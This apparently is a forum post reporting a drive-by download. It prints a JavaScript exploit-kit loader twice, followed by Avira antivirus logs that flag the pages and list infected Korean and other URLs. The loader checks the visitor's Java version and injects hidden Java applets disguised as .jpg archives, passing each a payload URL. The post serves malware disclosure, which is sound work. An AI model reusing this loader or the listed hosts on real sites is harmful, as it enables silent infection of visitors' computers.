http://61.111.4.39

fireold

1. var ckurl = ckl();
   
2. var wmck = deployJava.getJREs() + "";
   
3. wmck = parseInt(wmck.replace(/\.|\_/g, ''));
   
4. 
   
5. if (((wmck.length == 3) && (wmck == 170)) || ((wmck >= 17000) && (wmck < 17007))) {
   
6.     if (ck_wm.indexOf("msie 6") > -1) {
   
7.         document.writeln("<object classid="clsid:8ad9c840-044e-11d1-b3e9-00805f499d93" width=\'200\' height=\'200\'><param name=xiaomaolv value=\'" + ckurl + "\'><param name=bn value=\'woyouyizhixiaomaolv\'><param name=si value=\'conglaiyebuqi\'><param name=bs value=\'748\'><param name=CODE value=\'what_the_fucking_day.ckwmcc.class\'><param name=archive value=\'wmck.jpg\'><\/object>");
   
8.     } else {
   
9.         document.write("<br>");
   
10.         var gondady = document.createElement("body");
    
11.         document.body.appendChild(gondady);
    
12.         var gondad = document.createElement("applet");
    
13.         gondad.width = "256";
    
14.         gondad.height = "256";
    
15.         gondad.archive = "wmck.jpg";
    
16.         gondad.code = "what_the_fucking_day.ckwmcc.class";
    
17.         gondad.setAttribute("xiaomaolv", ckurl);
    
18.         gondad.setAttribute("bn", "woyouyizhixiaomaolv");
    
19.         gondad.setAttribute("si", "conglaiyebuqi");
    
20.         gondad.setAttribute("bs", "748");
    
21.         document.body.appendChild(gondad);
    
22.     }
    
23. } else if (wmck <= 16027) {
    
24.     var ckckx = document.createElement('applet');
    
25.     ckckx.archive = "ckwm.jpg";
    
26.     ckckx.code = "ckwmckwmckwmExp.class";
    
27.     ckckx.width = "1";
    
28.     ckckx.height = "1";
    
29.     document.body.appendChild(ckckx);
    
30.     var ckcks = document.createElement('param');
    
31.     ckcks.name = "dota";
    
32.     ckcks.value = ckurl;
    
33.     ckckx.appendChild(ckcks);
    
34. }

复制代码

1. <script>
   
2.   var ckurl = ckl();
   
3.   var wmck = deployJava.getJREs() + "";
   
4.   wmck = parseInt(wmck.replace(/\.|\_/g, ''));
   
5. 
   
6.   if (((wmck.length == 3) && (wmck == 170)) || ((wmck >= 17000) && (wmck < 17007))) {
   
7.     if (ck_wm.indexOf("msie 6") > -1) {
   
8.       document.writeln("<object classid="clsid:8ad9c840-044e-11d1-b3e9-00805f499d93" width=\'200\' height=\'200\'><param name=xiaomaolv value=\'" + ckurl + "\'><param name=bn value=\'woyouyizhixiaomaolv\'><param name=si value=\'conglaiyebuqi\'><param name=bs value=\'748\'><param name=CODE value=\'what_the_fucking_day.ckwmcc.class\'><param name=archive value=\'wmck.jpg\'><\/object>");
   
9.     } else {
   
10.       document.write("<br>");
    
11.       var gondady = document.createElement("body");
    
12.       document.body.appendChild(gondady);
    
13.       var gondad = document.createElement("applet");
    
14.       gondad.width = "256";
    
15.       gondad.height = "256";
    
16.       gondad.archive = "wmck.jpg";
    
17.       gondad.code = "what_the_fucking_day.ckwmcc.class";
    
18.       gondad.setAttribute("xiaomaolv", ckurl);
    
19.       gondad.setAttribute("bn", "woyouyizhixiaomaolv");
    
20.       gondad.setAttribute("si", "conglaiyebuqi");
    
21.       gondad.setAttribute("bs", "748");
    
22.       document.body.appendChild(gondad);
    
23.     }
    
24.   } else if (wmck <= 16027) {
    
25.     var ckckx = document.createElement('applet');
    
26.     ckckx.archive = "ckwm.jpg";
    
27.     ckckx.code = "ckwmckwmckwmExp.class";
    
28.     ckckx.width = "1";
    
29.     ckckx.height = "1";
    
30.     document.body.appendChild(ckckx);
    
31.     var ckcks = document.createElement('param');
    
32.     ckcks.name = "dota";
    
33.     ckcks.value = ckurl;
    
34.     ckckx.appendChild(ckcks);
    
35.   }
    
36. </script>

复制代码

Avira

2013/7/24 上午 06:00 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MQPF1KDL\index[2].htm'
      包含病毒或有害的程式 'JS/Dldr.Agent.bpe' [virus]
      已採取動作：
      發生錯誤，檔案未刪除。錯誤識別碼：26003.
      檔案無法刪除！.
      嘗試使用 ARK 程式庫執行動作。.
      檔案會移動至 '4dc87eb6.qua' 名稱底下的隔離區目錄。.

2013/7/24 上午 06:00 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        785
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/7/24 上午 06:00 [System Scanner] 發現惡意程式碼
      檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\E84PIVG0\xiangnian[1].htm'
      包含病毒或有害的程式 'EXP/JS.Expack.FP' [exploit]
      已採取動作：
      檔案會移動至 '54945d15.qua' 名稱底下的隔離區目錄。.

2013/7/24 上午 06:00 [System Scanner] 掃描
      掃描結束 [已完成全部的掃描。]。
      檔案數：        781
      目錄數：        0
      惡意程式碼數：        1
      警告數：        0

2013/7/24 上午 05:59 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\MQPF1KDL\index[2].htm 中
      偵測到病毒或有害的程式 'JS/Dldr.Agent.bpe [virus]'
      執行的動作：傳輸至掃描程式

2013/7/24 上午 05:59 [Web Protection] 發現惡意程式碼
      從 URL "http://www.uwaaa.co.kr/doseo/test/index.html" 存取資料時，
      發現病毒或有害的程式 'JS/Dldr.Agent.bpe' [virus]。
      已採取動作：封鎖的檔案

2013/7/24 上午 05:59 [Web Protection] 發現惡意程式碼
      從 URL "http://www.peltibt.co.kr/castle-php/64/index.html" 存取資料時，
      發現病毒或有害的程式 'JS/Dldr.Agent.bpe' [virus]。
      已採取動作：已略過

2013/7/24 上午 05:59 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\E84PIVG0\xiangnian[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.FP [exploit]'
      執行的動作：傳輸至掃描程式

2013/7/24 上午 05:59 [Real-Time Protection] 發現惡意程式碼
      在檔案 'C:\Users\vardon\AppData\Local\Microsoft\Windows\Temporary Internet
      Files\Low\Content.IE5\E84PIVG0\xiangnian[1].htm 中
      偵測到病毒或有害的程式 'EXP/JS.Expack.FP [exploit]'
      執行的動作：拒絕存取

2013/7/24 上午 05:59 [Web Protection] 發現惡意程式碼
      從 URL "http://www.kkjjgom.com/xiangnian.html" 存取資料時，
      發現病毒或有害的程式 'EXP/JS.Expack.FP' [exploit]。
      已採取動作：已略過

fs miss